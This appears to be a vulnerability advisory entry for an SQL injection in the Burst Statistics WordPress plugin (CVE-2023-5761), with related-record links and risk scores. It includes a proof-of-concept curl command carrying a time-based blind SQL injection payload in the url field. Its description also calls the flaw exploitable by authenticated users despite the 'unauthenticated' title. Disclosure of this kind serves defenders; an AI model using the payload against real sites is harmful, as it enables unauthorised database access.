Lucene search
WpvulndbWPEX-ID:0C0AB92C-8FDD-4A58-814F-E974714A20C8HistoryDec 11, 2023 - 12:00 a.m.
Burst Statistics (Free < 1.5.0, Pro < 1.5.1) - Unauthenticated SQL Injection
2023-12-1100:00:00
wpvulndb
95
burst statistics
sql injection
unauthenticated
Description The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated users, such as subscribers
curl 'https://example.com/burst-statistics-endpoint.php' \
-H 'content-type: text/plain;charset=UTF-8' \
--data-raw $'"{\\"fingerprint\\":false,\\"uid\\":\\"437a969907141c6c2042731efd2da038\\",\\"url\\":\\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\",\\"time_on_page\\":6907,\\"completed_goals\\":[]}"' \
--compressedRelated
openvas
openvas
prion
prion
Sql injection
2023-12-07 02:15:00
cvelist
cvelist
CVE-2023-5761
2023-12-07 02:00:05
cve
cve
CVE-2023-5761
2023-12-07 02:15:07
wpvulndb
wpvulndb
Burst Statistics (Free < 1.5.0, Pro < 1.5.1) - Unauthenticated SQL Injection
2023-12-11 00:00:00
nvd
nvd
CVE-2023-5761
2023-12-07 02:15:07
wordfence
wordfence
8 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
34.0%
Related for WPEX-ID:0C0AB92C-8FDD-4A58-814F-E974714A20C8